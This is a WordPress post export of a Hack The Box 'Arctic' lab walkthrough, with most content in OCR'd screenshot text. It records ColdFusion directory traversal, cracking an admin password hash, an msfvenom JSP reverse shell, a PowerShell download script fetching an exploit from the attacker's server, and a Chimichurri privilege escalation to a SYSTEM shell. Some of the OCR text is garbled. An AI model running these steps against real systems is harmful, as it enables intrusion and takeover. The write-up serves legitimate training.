{"id":63,"date":"2021-02-13T19:20:49","date_gmt":"2021-02-13T19:20:49","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=63"},"modified":"2021-02-13T19:30:12","modified_gmt":"2021-02-13T19:30:12","slug":"htb-arctic-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/13\/htb-arctic-walkthrough\/","title":{"rendered":"HTB &#8211; Arctic Walkthrough"},"content":{"rendered":"\n<p>nmap<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/4rRKqPP2x5AVEARgsW_UE1LuoESDt0nNBucBev1iIkGMHmI4qPn7J_4HLXpXlXew2VSeW8HpS23R9VyuOHSIH_Svab3McZglSEiWY7NPn5d-k_Kqt_y_ZGbuqFaCwVo39j33rGx0\" alt=\"Nmap scan report for 10.10. 10.11 \nHost is up (0.14s latency). \nNot shown: 997 filtered ports \nPORT \n135\/tcp \nSTATE SERVICE VERSION \nopen msrpc Microsoft Windows RPC \n8500\/tcp open fmtp? \n49154\/tcp open msrpc Microsoft Windows RPC \nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows \"\/><\/figure>\n\n\n\n<p>Port 8500 &#8211; ColdFusion<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/nS1CLzXhtcO3Cok8QhH8UnkBEJX4WN0iFhWsUYj1gNerlF1PMPQ41sqMkGetH6jm4qEcXeRElPCJ_oW2y_axBCNqevEYxyns7HDJjybYv1ru5auqgHmC5vMNW8otTvDNmbbG6Z9v\" alt=\"Index of\/ \n@ 10.10.10.11:8500 \nMost Visited O Getting Started OSCP a Pivot a PrivEsc ClientSide \nIndex of \/ \nCFIDE\/ \ncfdocs\/ \ndir \ndir \n03\/22\/17 08:52 \n03\/22\/17 08:55 \"\/><\/figure>\n\n\n\n<p>ColdFusion File Inclusion<\/p>\n\n\n\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/14641\">https:\/\/www.exploit-db.com\/exploits\/14641<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/KzPn9z9eJ19OHdtyxtgwPHLniRadrzdackrSAWRbmX5aNRnvXt-DRKsyDXNAnHBUwpll7woxxSdeaut_-tXDSup8pWi1XV7tUCWVKrafdh84NmraopiOCz34KYW1JSap79cZjaWv\" alt=\"ColdFusionAdministratc \nx \n#Wed X \nG) 4 10.10.10.11 \nAdobe ColdFusion - Dire 
X \nQ Search \nMost Visited O Getting Started EOSCP a Pivot a PrivEsc a ClientSide t Meterpreter a Web a DB \nexam \n*Wed Mar 22 EET 2017 \npassword=2F635F6D20E3FDEOC53075AUB68FB07DCEC9B03 \nenc ted=true \nadmin \n*Wed Mar 22 EET 2017 \npassword=2F635F6D20E3FDEOC53075AUB68FB07DCEC9B03 \nenc ted=true \n#Wed \nrdspass \npasswor \nencryptf \nMar 22 EET 2017 \naomoceceace \"\/><\/figure>\n\n\n\n<p>Hash Crack<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/llGufl1Koi-00Oc8Wkd1rPrT8RAyOW6RKD2Rd-lcwNShitXJi5jBEwYkhVgD37FbhzS74zg7KCgieWjBtg8t5FFMcRB3T8a5OagywTLeKtZLvRL7lKkV-6DylcTyM_oVEquRg_hJ\" alt=\"Possible Hashs: \n\u5196 + \u4e00 mySQL5 \n\u5196 SHA-I \nHASH: 2F635F6D20E3FDEOC53075A84868F807DCEC9803 \nSHA-1(SHA-1($pass)) \n\u4e00 37r00t6ka11 \u4e00 \u4e36 home \u4e36 kal sa \u4e36 TB \u4e36 arc hash-identifier \n\/ \u4e36 \nRoot@81ackp10it.com \nwww.81ackp101t.com \nBy Zlon3R \n\u4e36 VI . 1 \"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/JzTs_KZ0BZKqaFw1zc8PIOVpwvM5Q0jbMTXWeE5p0297kGlD5zNYw-tzpWkPY1N9AjVwdJzhANSkpAgTpSb4CSDz36P6-3IFAJnKMyro1WTBBL5roPxwbxam2US8nRR7bpxVpQND\" alt=\"@ https:\/\/hashkiller.co.uk\/Cracker \nMost Visited o Getting Started a OSCP a Pivot a PrivEsc a ClientSide a Meterpreter E Web \nHashKiller \nHash Cracker \nList Manager \nCracker Result \nWe cracked 1 hashes leaving 0 left. \nCrack my Hashes \nUpload button disabled? We use Google reCAPTGHA v3. 
\nCracker Results: \nSHAI happyday \"\/><\/figure>\n\n\n\n<p>JSP Shell Creation &amp; File Upload &amp; Shell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/3dmO24c-a4de1aMUS6h0vqR203asMFlE0iwY_5K_KfGXIF8qZI5k6ALAmWMiGLTv5CGmkCspLPghiFIxKSmNd4-7Jc24VmogMi_eiQn2WmT3XLWRzIedkKe-zSeUbVqTeEyUGWYL\" alt=\"msfvenom -p java\/jsp shell reverse tcp LHOST=10.10.14.10 LPORT=8888 -f raw &gt; shell.jsp \n'ayload size: 1497 bytes \"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/kynAwluKP4lgJ7jYeKOQev8pXmyApfQR57udmi3dtl8kxahOFHewsyE2bJ9uhi5UJVGsQZhAXHPlYAmKp78CFUsFjzai9iMoDdtGllcGhwelOG06UFbVSFhl2DXeqhInSV6Fwu-C\" alt=\"5 \nG) 4 10.10.10.11 \n:8500\/CFlDE\/administrator\/index.cfm \nQ Search \nMost Visited O Getting Started EOSCP a Pivot a PrivEsc a ClientSide a Meterpreter a Web a DB \nCF ADOBE* COLDFUSION' ADMINISTRATOR \nexam \nIll \\ \n\u2022e \ni \nQ \nLOGOUT \nExpand All X Collapse All \nSERVER SETTINGS \nSettings \nRequest Tuning \nCaching \nClient Variables \nMemoiY Variables \nMappings \nMail \nChalting \nFont Management \nJava and JVM \nSettings SummalY \nDATA &amp; SERVICES \nData Sources \nVerity Collections \nVerity K2 Sewer \nWeb Sewices \nFlex Integration \nDEBUGGING &amp; LOGGING \nDebug Output Settings \nDebugging IP Addresses \nDebugger Settings \nLogging Settings \nLog Files \nScheduled Tasks \nSystem Probes \nCode Analyzer \nLicense Scanner \nSERVER MONITORING \nEXTENSIONS \nEVENT GATE-NYS \nSECURITY \nDebugging &amp; Logging &gt; Add\/Edit Scheduled Task \nAdd\/Edit Scheduled Task \nTask Name \nDuration \nFrequency \nURL \nUser Name \nPassword \nTimeout (sec) \nProxy Server \nPublish \nFile \nshell \nStart Date 21 2019 \nO \nO \nRecurring \nDaily every \nDaily \nHours \nStan Time \nv \nEnd Date (optional) \nat \nMinutes \nSeconds \nEnd Time \nhttp:\/\/10.10.14.10:8000\/shell.jsp \n: Port \nSave output to a file 
\nion8\\wwwroot\\CFlDE\\shell.jsp \nResolve URL \nResolve Internal URLs so that links reman Intact \nSubmit Cancel \"\/><\/figure>\n\n\n\n<p>Run the task and open the file in the following directory<\/p>\n\n\n\n<p>C:\\ColdFusion8\\wwwroot\\CFIDE\\shell.jsp<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/_j8nG9OPIPZSrSaAPjRDLMxp-FaSArO9IcAET1ZNpn8v6ASrmX-XkKc3rpfbN3xBXB2yllSeST5fYOsK1rRO5c_YmqnQGCE0awh8CNW_czXnGwIWjWhj6YgCkSu8ipXPQYrpHXFH\" alt=\"Debugging &amp; Logging &gt; Scheduled Tasks \nScheduled tasks can create static web pages from dynamic data sources. You can also schedule tasks to update Verity searches and to create repolts \nSchedule New Task \nScheduled Tasks \nActions \nTask Name \n@ o a @ shell \nDuration \n21 Mai 2019 \nInterval \nOne-time at 1:45 \"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/FZKmnhA6aM1lcnEeA8xgoZrLiN5K8kE2EV1NKpN-hdJUECKW-zTw6nQ132liKHN8lP_uFytdBwz0QCpQriDZ0m3KNt5l4rPybAIfH0CnWB2WMFkKBDcWRPmSxSBxhmFws-Tmy4Vq\" alt=\"nc -nlvp 8888 \nlistening on [any] 8888 \nconnect to [10.10. 14.10] from (UNKNOWN} [10.10.10.11] \nMicrosoft Windows [Version 6.1.7600] \nCopyright (c) 2009 Microsoft Corporation. All \nrights \nColdFusionAdministratc X 10.10.10.11:8500\/CFlDE\/sm X \n@ 10.10.10.11:8500\/CFlDE\/shell.jsp \n49419 \nreserved. 
\nroot@kali: home\/kalisa\/H \nMozilla Firefox \n\u2022e Q search \nMost Visited O Getting Started EOSCP a Pivot a PrivEsc a ClientSide EMeterpreter a Web a DB texam \"\/><\/figure>\n\n\n\n<p>Privilege escalation<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/e-petBrSQIEv8f65KNAHgyvNRUwOV7nKEEHgF63mI4P9x98w4U_OWY9vkHt3lGRWc4Prer6sGo0JK-0jT-Yy09osdXNE4IoYbnIBsOjcs0iXi-rtscPkEnA3FUmonAWToJCV4w4M\" alt=\"systeminfo \nHost Name: \nOS Name: \nOS Version: \nOS manufacturer: \nOS Configuration: \nOS Build Type: \nRegistered Owner: \nRegistered Organization: \nProduct ID: \nOriginal Install Date: \nSystem Boot Time: \nSystem manufacturer: \nSystem model: \nSystem Type: \nProcessor(s): \nBIOS Version: \nWindows Directory: \nSystem Directory: \nBoot Device: \nSystem Locale: \nInput Locale: \nTime Zone: \nTotal Physical memory: \nAvailable Physical memory: \nVirtual memory: max Size: \nVirtual memory: Available: \nVirtual memory: In Use: \nPage File Location(s): \nDomain: \nLogon Server: \nHotfix(s): \nNetwork Card(s): \nARCTIC \nMicrosoft Windows Server 2008 R2 Standard \n6.1.7600 N\/A Build 7600 \nMicrosoft Corporation \nStandalone Server \nmultiprocessor Free \nWindows User \n55041-507-9857321-84451 \n22\/3\/2017, \n21\/5\/2019, \nVPlware, Inc. \nVPlware Virtual Platform \nx64-based PC \n2 Processor(s) Installed. \n[01]: Inte164 Family 6 model 63 Stepping 2 Genuinelntel \n[02]: Inte164 Family 6 model 63 Stepping 2 Genuinelntel \n-2594 Mhz \n-2594 Mhz \nPhoenix Technologies LTD 6.00, \nC : \\Windows \nel; Greek \nen-us;English (United States) \n(UT CA-02:00) Athens, Bucharest, \n5\/4\/2016 \nIstanbul \n1.024 ma \n208 ma \n2.048 ma \n1.156 ma \n892 \nC: \\pagefile.sys \nN\/A \nN\/A \n1 NIC(s) Installed. 
\n[01]: Intel (R) PRO\/IOOO \nPIT Network Connection \"\/><\/figure>\n\n\n\n<p>Python exploit suggester<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/d7Zd5vi7geOq2KIvfKU-2gwghlgaQgeY5ac9CApv9qYCWrfzunIlC13AImDjrkJnMpzKWUNiwen7YCCllZWk3mNDnnU6rAaUO5dbOQBKQPpLFQuMaZyf3BlPv7rgaP1ftUd5wptV\" alt=\"python \n[ initiating winsploit version 3.3... \n[+1 writing to file 2019-05-19-mssb.xls \n[ done \nPIS11-011: \nms10-073: \nms10-061: \nms10-059: \nms10-047: \nms10-002: \nPIS09-072: \n. \/windows-exploit-suggester.py \n- -update \n-systeminfo systeminfo \npython windows-exploit-suggester.py \ninitiating winsploit version 3.3... \ndatabase file detected as xls or xlsx based on extension \nattempting to read from the systeminfo input file \nsysteminfo input file read successfully (utf-8) \nquerying database file for potential vulnerabilities \n-database 2019-05-19-mssb.xls \n[+1 \n[+1 \n[+1 \ncomparing the O hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits \nthere are now 197 remaining vulns \n[E] exploitdb POC, [PI] metasploit module, [ * ] missing bulletin \nwindows version identified as 'Windows 2008 R2 64-bit' \nPIS13-009: Cumulative Security Update for Internet Explorer (2792100) \nCritical \nPIS13-005: Vulnerability in Windows Kernel-mode Driver Could Allow Elevation of Privilege (2778930) \nImportant \nPIS12-037: Cumulative Security Update for Internet Explorer (2699988) \nCritical \nhttp \/\/www. exploit-db . com\/exploits\/35273\/ \nInternet Explorer 8 \nFixed col span ID Full ASLR, DEP &amp; EMET 5. , \nPOC \nhttp \/\/www. exploit-db . 
com\/exploits\/34815\/ \nInternet Explorer 8 \nFixed col span ID Full ASLR, DEP &amp; EMET 5.0 Bypass (ms12-037), \nVulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) \nImportant \nVulnerabilities in Windows Kernel-mode Drivers Could Allow Elevation of Privilege (981957) \nImportant \nVulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) \nCritical \nVulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) \nImportant \nVulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) \nImportant \nCumulative Security Update for Internet Explorer (978207) \nCritical \nCumulative Security Update for Internet Explorer (976325) \nCritical \ndone \nPOC \"\/><\/figure>\n\n\n\n<p>Upload ms10-059.exe (Chimichurri) via PowerShell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/ZbRCrTbzS3jTzeehQDoxG2m8MMW2BNry6o89Rzz359gxIEmu5V0f9A0rm1jYIN7jLIck79iISBLhLTvpjv-IZ0ENpCuDtcaS6hPCnsmxKRnpE2bw5_yiFl4n2dB92K3cRCIlDYJp\" alt=\"Applications \nPlaces \nTerminator \nSun 10:50 \nroot@kali: \/home\/kalisa\/HTB\/arctic \nroot@kali: \/mnt\/hgfs\/Kali-Shared \nroot@kali: \/home\/kalisa\/HTB\/arctic \nroot@kali: \/home\/kalisa\/HTB\/arctic \ne \nroot@kali: \/home\/kalisa\/HTB\/arctic \nroot@kali: \/home\/kalisa\/HTB 158x34 \n18\/03\/2008 \n22\/03\/2017 \n18\/03\/2008 \n18\/03\/2008 \n12:11 \n09:53 \n12:11 \n12:11 \n17 File(s) \n64.512 wsconfig.exe \n1.013 wsconfig_jvm.config \n64.512 wsd12java.exe \n64.512 xmlscript.exe \n3.339.263 bytes \n2 Dir(s) 33.180. 127.232 bytes free \n$storageDir \n$pwd &gt; wget.psl \necho $storageDir \n$pwd &gt; wget.psl \n$webclient \nNew-Object System.Net.WebClient &gt;&gt;wget.psl \necho $webclient \nNew-Object System.Net.WebClient \n$url \n&quot;http:\/\/10. \necho $url \n\/\/10. 10 . 14 . 10 8000\/ms10-059. exe&quot; \n$file \n\u2022vms10-059. 
\necho $file \n&quot;PlSIO-059.exe&quot; &gt;&gt;wget.psl \n. PSI \n10.14.10:8000\/ms10-059.exe&quot; \n. PSI \nPSI \n&gt;&gt;wget.psl \necho &gt;&gt;wget.psl \n-ExecutionPolicy Bypass -NoLogo \npower shell. exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile \n-Nonlnteractive \n-File wget.psl \n-NoProfile \n-File wget.psl \ndir \nVolume in drive C has no label. \nVolume Serial Number is F88F-4EA5 \nDirectory of \n21\/05\/2019 01:52 \nroot@kali: \/home\/kalisa\/HTB\/arctic 158x8 \nIs \ncoldfusion-login coldfusion.py hash msf . exe nmap.gnmap nmap.nmap nmap.xml power shell shell.jsp \nroot@kati : \/home\/kaIisa\/HTB\/arctic# \nserving HTTP on O.O.O.O port 8000 \npython -m SimpleHTTPServer \n10.10. 10.11 \n10.10. 10.11 \n10.10. 10.11 \n[19\/may\/2019 \n[19\/may\/2019 10:40. \n\u202248] \n[19\/may\/2019 \n&quot;GET \/shell.jsp HTTP\/I.I&quot; \n200 \n&quot;GET \/shell.jsp HTTP\/I.I&quot; \n200 \n&quot;GET \/ms10-059.exe HTTP\/I.I&quot; 200 \"\/><\/figure>\n\n\n\n<p>Get an admin shell with exe file<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/TfPhiNd36xZSa18e2xR-Zck5JCmqY4V1u0Nn5Jtf0IpUxKjQxEiowOOWQjS4NsNwLQqAVUpkJC3unn6xO8viqBk6l5jOLdKNdTy_7ebg06_vuGDfGVZvvlWIAaPLTRMiMI6SRdz_\" alt=\"19\/01\/2008 \n18\/03\/2008 \n64.512 \n18\/03\/2008 \n71.680 \n18\/03\/2008 \n18\/03\/2008 \n64.512 \n22\/03\/2017 \n18\/03\/2008 \n64.512 \n21\/05\/2019 \n784.384 \n18\/03\/2008 \n34.816 \n18\/03\/2008 \n64.512 \n21\/05\/2019 \n21\/05\/2019 \n18\/03\/2008 \n78.848 \n18\/03\/2008 \n64.512 \n22\/03\/2017 \n18\/03\/2008 \n64.512 \n18\/03\/2008 \n64.512 \n10. \n12. \n.11 \n12. \n12. \n.11 \n12. \n09. \n.53 \n12. \n02. \n.04 \n12. \n12. \n.11 \n02. \n01. \n.50 \n12. \n12. \n.11 \n09. \n12. \n.11 \n12. \n18 File(s) \n2. 629.632 \n5.120 \n1.804 \n179 \n112 \n1.013 \nj ikes.exe \nj run. exe \nj runsvc. exe \nj runsvcmsg.dll \njspc.exe \njvm.config \nmigrate exe \nms10-059.exe \nportscan.dll \nsniffer . 
exe \nwget.psl \nwget . pslpowershell. exe \nWindowsLogin . dll \nwsconfig. exe \nwsconfig_j vm . config \nwsd12j ava . exe \nxmlscript. exe \n2 Dir(s) 33.182. \nC : 10 \nms10-059.exe 10.10.14.10 6666 \n\/ Chimichurri\/--&gt;This exploit gives you a Local System shell <8R&gt;\/Chimichurri\/--&gt;Changing registry \nvalues.. .<8R&gt;\/Chimichurri\/--&gt;Got SYSTEM token.. .<8R&gt;\/Chimichurri\/--&gt;Running reverse shell.. \n\/ Chimichurri\/--&gt;Restoring default registry values.. \nroot@kali: \/home\/kalisa\/HTB\/arctic 96x15 \nnc -nlvp 6666 \nlistening on [any] 6666 \nconnect to [10.10. 14.10] from (UNKNOWN) [10.10. 10.11] 49535 \nMicrosoft Windows [Version 6.1.7600] \nCopyright (c) 2009 Microsoft Corporation. All rights reserved. \nwhoami \nnt authority\\system \n4. 123.684 bytes \n519.296 bytes free \n-059. exe 10.10. 14.10 6666 \"\/><\/figure>\n\n\n\n<p>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>nmap Port 8500 &#8211; ColdFusion ColdFusion File Inclusion https:\/\/www.exploit-db.com\/exploits\/14641 Hash Crack JSP Shell Creation &amp; File Upload &amp; Shell Run the task and open the file in the following directory C:\\ColdFusion8\\wwwroot\\CFIDE\\shell.jsp Privilege escalation Python exploit suggester Upload ms10-059.exe (Chimichurri) via PowerShell Get an admin shell with exe file 
.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/63"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=63"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/63\/revisions"}],"predecessor-version":[{"id":64,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/63\/revisions\/64"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=63"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=63"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=63"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}